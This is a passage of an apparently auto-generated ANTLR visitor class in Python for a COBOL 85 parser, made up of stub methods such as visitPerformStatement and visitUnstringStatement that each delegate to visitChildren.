return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callUsingParameter.
def visitCallUsingParameter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callByReferencePhrase.
def visitCallByReferencePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callByReference.
def visitCallByReference(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callByValuePhrase.
def visitCallByValuePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callByValue.
def visitCallByValue(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callByContentPhrase.
def visitCallByContentPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callByContent.
def visitCallByContent(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#callGivingPhrase.
def visitCallGivingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#cancelStatement.
def visitCancelStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#cancelCall.
def visitCancelCall(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closeStatement.
def visitCloseStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closeFile.
def visitCloseFile(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closeReelUnitStatement.
def visitCloseReelUnitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closeRelativeStatement.
def visitCloseRelativeStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closePortFileIOStatement.
def visitClosePortFileIOStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closePortFileIOUsing.
def visitClosePortFileIOUsing(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closePortFileIOUsingCloseDisposition.
def visitClosePortFileIOUsingCloseDisposition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closePortFileIOUsingAssociatedData.
def visitClosePortFileIOUsingAssociatedData(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#closePortFileIOUsingAssociatedDataLength.
def visitClosePortFileIOUsingAssociatedDataLength(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#computeStatement.
def visitComputeStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#computeStore.
def visitComputeStore(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#continueStatement.
def visitContinueStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#deleteStatement.
def visitDeleteStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#disableStatement.
def visitDisableStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#displayStatement.
def visitDisplayStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#displayOperand.
def visitDisplayOperand(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#displayAt.
def visitDisplayAt(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#displayUpon.
def visitDisplayUpon(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#displayWith.
def visitDisplayWith(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideStatement.
def visitDivideStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideIntoStatement.
def visitDivideIntoStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideIntoGivingStatement.
def visitDivideIntoGivingStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideByGivingStatement.
def visitDivideByGivingStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideGivingPhrase.
def visitDivideGivingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideInto.
def visitDivideInto(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideGiving.
def visitDivideGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#divideRemainder.
def visitDivideRemainder(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#enableStatement.
def visitEnableStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#entryStatement.
def visitEntryStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateStatement.
def visitEvaluateStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateSelect.
def visitEvaluateSelect(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateAlsoSelect.
def visitEvaluateAlsoSelect(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateWhenPhrase.
def visitEvaluateWhenPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateWhen.
def visitEvaluateWhen(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateCondition.
def visitEvaluateCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateThrough.
def visitEvaluateThrough(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateAlsoCondition.
def visitEvaluateAlsoCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateWhenOther.
def visitEvaluateWhenOther(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#evaluateValue.
def visitEvaluateValue(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#execCicsStatement.
def visitExecCicsStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#execSqlStatement.
def visitExecSqlStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#execSqlImsStatement.
def visitExecSqlImsStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#exhibitStatement.
def visitExhibitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#exhibitOperand.
def visitExhibitOperand(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#exitStatement.
def visitExitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#generateStatement.
def visitGenerateStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#gobackStatement.
def visitGobackStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#goToStatement.
def visitGoToStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#goToStatementSimple.
def visitGoToStatementSimple(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#goToDependingOnStatement.
def visitGoToDependingOnStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#ifStatement.
def visitIfStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#ifThen.
def visitIfThen(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#ifElse.
def visitIfElse(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#initializeStatement.
def visitInitializeStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#initializeReplacingPhrase.
def visitInitializeReplacingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#initializeReplacingBy.
def visitInitializeReplacingBy(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#initiateStatement.
def visitInitiateStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectStatement.
def visitInspectStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectTallyingPhrase.
def visitInspectTallyingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectReplacingPhrase.
def visitInspectReplacingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectTallyingReplacingPhrase.
def visitInspectTallyingReplacingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectConvertingPhrase.
def visitInspectConvertingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectFor.
def visitInspectFor(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectCharacters.
def visitInspectCharacters(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectReplacingCharacters.
def visitInspectReplacingCharacters(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectAllLeadings.
def visitInspectAllLeadings(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectReplacingAllLeadings.
def visitInspectReplacingAllLeadings(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectAllLeading.
def visitInspectAllLeading(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectReplacingAllLeading.
def visitInspectReplacingAllLeading(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectBy.
def visitInspectBy(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectTo.
def visitInspectTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inspectBeforeAfter.
def visitInspectBeforeAfter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeStatement.
def visitMergeStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeOnKeyClause.
def visitMergeOnKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeCollatingSequencePhrase.
def visitMergeCollatingSequencePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeCollatingAlphanumeric.
def visitMergeCollatingAlphanumeric(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeCollatingNational.
def visitMergeCollatingNational(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeUsing.
def visitMergeUsing(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeOutputProcedurePhrase.
def visitMergeOutputProcedurePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeOutputThrough.
def visitMergeOutputThrough(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeGivingPhrase.
def visitMergeGivingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mergeGiving.
def visitMergeGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#moveStatement.
def visitMoveStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#moveToStatement.
def visitMoveToStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#moveToSendingArea.
def visitMoveToSendingArea(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#moveCorrespondingToStatement.
def visitMoveCorrespondingToStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#moveCorrespondingToSendingArea.
def visitMoveCorrespondingToSendingArea(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multiplyStatement.
def visitMultiplyStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multiplyRegular.
def visitMultiplyRegular(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multiplyRegularOperand.
def visitMultiplyRegularOperand(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multiplyGiving.
def visitMultiplyGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multiplyGivingOperand.
def visitMultiplyGivingOperand(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multiplyGivingResult.
def visitMultiplyGivingResult(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#openStatement.
def visitOpenStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#openInputStatement.
def visitOpenInputStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#openInput.
def visitOpenInput(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#openOutputStatement.
def visitOpenOutputStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#openOutput.
def visitOpenOutput(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#openIOStatement.
def visitOpenIOStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#openExtendStatement.
def visitOpenExtendStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performStatement.
def visitPerformStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performInlineStatement.
def visitPerformInlineStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performProcedureStatement.
def visitPerformProcedureStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performType.
def visitPerformType(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performTimes.
def visitPerformTimes(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performUntil.
def visitPerformUntil(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performVarying.
def visitPerformVarying(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performVaryingClause.
def visitPerformVaryingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performVaryingPhrase.
def visitPerformVaryingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performAfter.
def visitPerformAfter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performFrom.
def visitPerformFrom(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performBy.
def visitPerformBy(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performTestClause.
def visitPerformTestClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#purgeStatement.
def visitPurgeStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#readStatement.
def visitReadStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#readInto.
def visitReadInto(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#readWith.
def visitReadWith(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#readKey.
def visitReadKey(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveStatement.
def visitReceiveStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveFromStatement.
def visitReceiveFromStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveFrom.
def visitReceiveFrom(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveIntoStatement.
def visitReceiveIntoStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveNoData.
def visitReceiveNoData(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveWithData.
def visitReceiveWithData(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveBefore.
def visitReceiveBefore(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveWith.
def visitReceiveWith(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveThread.
def visitReceiveThread(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveSize.
def visitReceiveSize(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveStatus.
def visitReceiveStatus(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#releaseStatement.
def visitReleaseStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#returnStatement.
def visitReturnStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#returnInto.
def visitReturnInto(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#rewriteStatement.
def visitRewriteStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#rewriteFrom.
def visitRewriteFrom(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#searchStatement.
def visitSearchStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#searchVarying.
def visitSearchVarying(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#searchWhen.
def visitSearchWhen(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendStatement.
def visitSendStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendStatementSync.
def visitSendStatementSync(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendStatementAsync.
def visitSendStatementAsync(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendFromPhrase.
def visitSendFromPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendWithPhrase.
def visitSendWithPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendReplacingPhrase.
def visitSendReplacingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendAdvancingPhrase.
def visitSendAdvancingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendAdvancingPage.
def visitSendAdvancingPage(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendAdvancingLines.
def visitSendAdvancingLines(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendAdvancingMnemonic.
def visitSendAdvancingMnemonic(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#setStatement.
def visitSetStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#setToStatement.
def visitSetToStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#setUpDownByStatement.
def visitSetUpDownByStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#setTo.
def visitSetTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#setToValue.
def visitSetToValue(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#setByValue.
def visitSetByValue(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortStatement.
def visitSortStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortOnKeyClause.
def visitSortOnKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortDuplicatesPhrase.
def visitSortDuplicatesPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortCollatingSequencePhrase.
def visitSortCollatingSequencePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortCollatingAlphanumeric.
def visitSortCollatingAlphanumeric(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortCollatingNational.
def visitSortCollatingNational(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortInputProcedurePhrase.
def visitSortInputProcedurePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortInputThrough.
def visitSortInputThrough(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortUsing.
def visitSortUsing(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortOutputProcedurePhrase.
def visitSortOutputProcedurePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortOutputThrough.
def visitSortOutputThrough(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortGivingPhrase.
def visitSortGivingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortGiving.
def visitSortGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#startStatement.
def visitStartStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#startKey.
def visitStartKey(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stopStatement.
def visitStopStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stopStatementGiving.
def visitStopStatementGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stringStatement.
def visitStringStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stringSendingPhrase.
def visitStringSendingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stringSending.
def visitStringSending(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stringDelimitedByPhrase.
def visitStringDelimitedByPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stringForPhrase.
def visitStringForPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stringIntoPhrase.
def visitStringIntoPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stringWithPointerPhrase.
def visitStringWithPointerPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractStatement.
def visitSubtractStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractFromStatement.
def visitSubtractFromStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractFromGivingStatement.
def visitSubtractFromGivingStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractCorrespondingStatement.
def visitSubtractCorrespondingStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractSubtrahend.
def visitSubtractSubtrahend(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractMinuend.
def visitSubtractMinuend(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractMinuendGiving.
def visitSubtractMinuendGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractGiving.
def visitSubtractGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractMinuendCorresponding.
def visitSubtractMinuendCorresponding(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#terminateStatement.
def visitTerminateStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringStatement.
def visitUnstringStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringSendingPhrase.
def visitUnstringSendingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringDelimitedByPhrase.
def visitUnstringDelimitedByPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringOrAllPhrase.
def visitUnstringOrAllPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringIntoPhrase.
def visitUnstringIntoPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringInto.
def visitUnstringInto(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringDelimiterIn.
def visitUnstringDelimiterIn(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringCountIn.
def visitUnstringCountIn(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringWithPointerPhrase.
def visitUnstringWithPointerPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringTallyingPhrase.
def visitUnstringTallyingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#useStatement.
def visitUseStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#useAfterClause.
def visitUseAfterClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#useAfterOn.
def visitUseAfterOn(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#useDebugClause.
def visitUseDebugClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#useDebugOn.
def visitUseDebugOn(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeStatement.
def visitWriteStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeFromPhrase.
def visitWriteFromPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeAdvancingPhrase.
def visitWriteAdvancingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeAdvancingPage.
def visitWriteAdvancingPage(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeAdvancingLines.
def visitWriteAdvancingLines(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeAdvancingMnemonic.
def visitWriteAdvancingMnemonic(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeAtEndOfPagePhrase.
def visitWriteAtEndOfPagePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeNotAtEndOfPagePhrase.
def visitWriteNotAtEndOfPagePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#atEndPhrase.
def visitAtEndPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#notAtEndPhrase.
def visitNotAtEndPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#invalidKeyPhrase.
def visitInvalidKeyPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#notInvalidKeyPhrase.
def visitNotInvalidKeyPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#onOverflowPhrase.
def visitOnOverflowPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#notOnOverflowPhrase.
def visitNotOnOverflowPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#onSizeErrorPhrase.
def visitOnSizeErrorPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#notOnSizeErrorPhrase.
def visitNotOnSizeErrorPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#onExceptionClause.
def visitOnExceptionClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#notOnExceptionClause.
def visitNotOnExceptionClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#arithmeticExpression.
def visitArithmeticExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#plusMinus.
def visitPlusMinus(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multDivs.
def visitMultDivs(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multDiv.
def visitMultDiv(self, ctx):
return self.visitChildren(ctx)
